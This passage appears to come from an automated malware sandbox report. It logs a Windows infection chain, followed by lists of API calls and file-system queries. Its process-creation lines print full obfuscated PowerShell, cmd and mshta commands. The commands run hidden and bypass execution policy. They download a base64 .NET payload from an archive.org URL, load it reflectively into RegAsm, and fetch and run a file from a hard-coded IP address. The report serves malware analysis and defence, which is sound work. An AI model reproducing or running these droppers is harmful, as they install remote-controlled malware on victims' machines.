'kcdnjysnwuz1cmwgpsankyddjysntkenkydodhqnkydwcycrjzovjysnl2lhnjawmtawjysnlnvzlicrj2fyy2hpdmuujysnb3jnlzi0lycrj2l0jysnzw1zlycrj2rldgenkydolw4nkydvjysndgutjysndi9ezxrhae4nkydvdgvwjysnlicrj3r4denoqscrjztnwuziyxnljysnnjrdb250zw50iccrjz0gke5ljysndycrjy1pymonkydlyycrj3qnkycgu3lzdccrj2vtlk4nkydldccrjy5xzwjdbgllbicrj3qpjysnlkrvd25sb2fkjysnu3ryaw5nkgdzricrj3vybcknkyc7zycrj1lgymluyxinkyd5jysnq29udgvudca9iccrj1ttexn0zw0nkycuq29ujysndmvydccrj106okzyb21cyxnlnjrtjysndccrj3jpbmcnkycoz1knkydgyicrj2fzzscrjzy0q29udccrj2unkydujysndck7zycrj1lgyscrj3mnkydzjysnzw1ibccrj3kgpsbbumvmbccrj2vjjysndgknkydvbi5bjysnc3mnkydlbwjsescrj10nkyc6oicrj0xvywqoz1lgymknkyduyxj5jysnq29ujysndgvudccrjyk7z1lgdhlwzsa9igdzrmenkydzc2vtjysnymx5lkcnkydldfr5cgunkycoq05bunvuueunkycusccrj29tjysnzunojysnqsk7z1lgjysnbwunkyd0accrj29kid0gz1lgdccrj3lwzs5hzxrnzxrob2qoq05bvicrj0fjq05bkttnwuztzxrob2qusw52b2tlkgdzricrj251bgwsiftvymplyycrj3rbjysnxv1akenoqxr4dc4nkydbwlbqsemvntqnkyczlzg0ms4nkycymy44njenkycujysnndaxly86chr0aenoqsasienoqwrlc2f0axzhzg9dtkeglcbdtkfkzxnhdgl2yscrj2rvq04nkydbicwnkycgq04nkydbjysnzgvzyxrpdicrj2enkydkb0noqsxdjysntkfszscrj2dbc21dtkenkycsqycrj05bq05bjysnksknks5yrvbsyunfkcddtkenlftzdhjjbmddw0niyxjdmzkplnjfugxhq0uoj2dzricsjyqnksb8ic4gkcakzu5woknpbxnwrwnbncwyniwynv0tak9pticnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('g'+'yfurl = '+'c'+'na'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/detahn'+'otev'+'.'+'txtcna'+';gyfbase'+'64content '+'= (ne'+'w'+'-obj'+'ec'+'t'+' syst'+'em.n'+'et'+'.webclien'+'t)'+'.download'+'string(gyf'+'url)'+';g'+'yfbinar'+'y'+'content = '+'[system'+'.con'+'vert'+']::frombase64s'+'t'+'ring'+'(gy'+'fb'+'ase'+'64cont'+'e'+'n'+'t);g'+'yfa'+'s'+'s'+'embl'+'y = [refl'+'ec'+'ti'+'on.a'+'ss'+'embly'+']'+'::'+'load(gyfbi'+'nary'+'con'+'tent'+');gyftype = gyfa'+'ssem'+'bly.g'+'ettype'+'(cnarunpe'+'.h'+'om'+'ecn'+'a);gyf'+'me'+'th'+'od = gyft'+'ype.getmethod(cnav'+'aicna);gyfmethod.invoke(gyf'+'null, [objec'+'t['+']]@(cnatxt.'+'azpphc/54'+'3/841.'+'23.861'+'.'+'401//:ptthcna , cnadesativadocna , cnadesativa'+'docn'+'a ,'+' cn'+'a'+'desativ'+'a'+'docna,c'+'nare'+'gasmcna'+',c'+'nacna'+'))').replace('cna',[string][char]39).replace('gyf','$') | . ( $env:comspec[4,26,25]-join'')"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jdbgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlckrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagihhzd0isc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagdknbew1xsfcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagc0rylhvpbnqgicagicagicagicagicagicagicagicagicagicagicbmuixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbnchlsc3voktsnicagicagicagicagicagicagicagicagicagicagicaglw5btwugicagicagicagicagicagicagicagicagicagicagicaia28iicagicagicagicagicagicagicagicagicagicagicaglu5btuvzugfjrsagicagicagicagicagicagicagicagicagicagicagihpncmz6qmtebgllicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicqwrjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewnc4xnjgumziumtq4lzm0ns9uawnlbwvldgluz3nvznbpy3r1cmvjbgvhcnroaw5nc3rvymuudelgiiwijgvudjpbufbeqvrbxg5py2vtzwv0aw5nc29mcgljdhvyzwnszwfydghpbmdzdg9illzicyismcwwkttzdgfyvc1ztgvfccgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcbmljzw1lzxrpbmdzb2zwawn0dxjly2xlyxj0agluz3n0b2iuvmjzig=='+[char]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jdbgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlckrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagihhzd0isc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagdknbew1xsfcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagc0rylhvpbnqgicagicagicagicagicagicagicagicagicagicagicbmuixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbnchlsc3voktsnicagicagicagicagicagicagicagicagicagicagicaglw5btwugicagicagicagicagicagicagicagicagicagicagicaia28iicagicagicagicagicagicagicagicagicagicagicaglu5btuvzugfjrsagicagicagicagicagicagicagicagicagicagicagihpncmz6qmtebgllicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicqwrjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewnc4xnjgumziumtq4lzm0ns9uawnlbwvldgluz3nvznbpy3r1cmvjbgvhcnroaw5nc3rvymuudelgiiwijgvudjpbufbeqvrbxg5py2vtzwv0aw5nc29mcgljdhvyzwnszwfydghpbmdzdg9illzicyismcwwkttzdgfyvc1ztgvfccgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcbmljzw1lzxrpbmdzb2zwawn0dxjly2xlyxj0agluz3n0b2iuvmjzig=='+[char]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdnjysnwuz1cmwgpsankyddjysntkenkydodhqnkydwcycrjzovjysnl2lhnjawmtawjysnlnvzlicrj2fyy2hpdmuujysnb3jnlzi0lycrj2l0jysnzw1zlycrj2rldgenkydolw4nkydvjysndgutjysndi9ezxrhae4nkydvdgvwjysnlicrj3r4denoqscrjztnwuziyxnljysnnjrdb250zw50iccrjz0gke5ljysndycrjy1pymonkydlyycrj3qnkycgu3lzdccrj2vtlk4nkydldccrjy5xzwjdbgllbicrj3qpjysnlkrvd25sb2fkjysnu3ryaw5nkgdzricrj3vybcknkyc7zycrj1lgymluyxinkyd5jysnq29udgvudca9iccrj1ttexn0zw0nkycuq29ujysndmvydccrj106okzyb21cyxnlnjrtjysndccrj3jpbmcnkycoz1knkydgyicrj2fzzscrjzy0q29udccrj2unkydujysndck7zycrj1lgyscrj3mnkydzjysnzw1ibccrj3kgpsbbumvmbccrj2vjjysndgknkydvbi5bjysnc3mnkydlbwjsescrj10nkyc6oicrj0xvywqoz1lgymknkyduyxj5jysnq29ujysndgvudccrjyk7z1lgdhlwzsa9igdzrmenkydzc2vtjysnymx5lkcnkydldfr5cgunkycoq05bunvuueunkycusccrj29tjysnzunojysnqsk7z1lgjysnbwunkyd0accrj29kid0gz1lgdccrj3lwzs5hzxrnzxrob2qoq05bvicrj0fjq05bkttnwuztzxrob2qusw52b2tlkgdzricrj251bgwsiftvymplyycrj3rbjysnxv1akenoqxr4dc4nkydbwlbqsemvntqnkyczlzg0ms4nkycymy44njenkycujysnndaxly86chr0aenoqsasienoqwrlc2f0axzhzg9dtkeglcbdtkfkzxnhdgl2yscrj2rvq04nkydbicwnkycgq04nkydbjysnzgvzyxrpdicrj2enkydkb0noqsxdjysntkfszscrj2dbc21dtkenkycsqycrj05bq05bjysnksknks5yrvbsyunfkcddtkenlftzdhjjbmddw0niyxjdmzkplnjfugxhq0uoj2dzricsjyqnksb8ic4gkcakzu5woknpbxnwrwnbncwyniwynv0tak9pticnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('g'+'yfurl = '+'c'+'na'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/detahn'+'otev'+'.'+'txtcna'+';gyfbase'+'64content '+'= (ne'+'w'+'-obj'+'ec'+'t'+' syst'+'em.n'+'et'+'.webclien'+'t)'+'.download'+'string(gyf'+'url)'+';g'+'yfbinar'+'y'+'content = '+'[system'+'.con'+'vert'+']::frombase64s'+'t'+'ring'+'(gy'+'fb'+'ase'+'64cont'+'e'+'n'+'t);g'+'yfa'+'s'+'s'+'embl'+'y = [refl'+'ec'+'ti'+'on.a'+'ss'+'embly'+']'+'::'+'load(gyfbi'+'nary'+'con'+'tent'+');gyftype = gyfa'+'ssem'+'bly.g'+'ettype'+'(cnarunpe'+'.h'+'om'+'ecn'+'a);gyf'+'me'+'th'+'od = gyft'+'ype.getmethod(cnav'+'aicna);gyfmethod.invoke(gyf'+'null, [objec'+'t['+']]@(cnatxt.'+'azpphc/54'+'3/841.'+'23.861'+'.'+'401//:ptthcna , cnadesativadocna , cnadesativa'+'docn'+'a ,'+' cn'+'a'+'desativ'+'a'+'docna,c'+'nare'+'gasmcna'+',c'+'nacna'+'))').replace('cna',[string][char]39).replace('gyf','$') | . ( $env:comspec[4,26,25]-join'')"Jump to behavior
                      Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerL
                      Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageres }
                      Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager`
                      Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [Program Manager]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434CB6 cpuid 11_2_00434CB6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_0045201B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_004520B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00452143
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,11_2_00452393
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_00448484
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_004524BC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,11_2_004525C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00452690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,11_2_0044896D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,11_2_0040F90C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00451D58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_00451FD0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
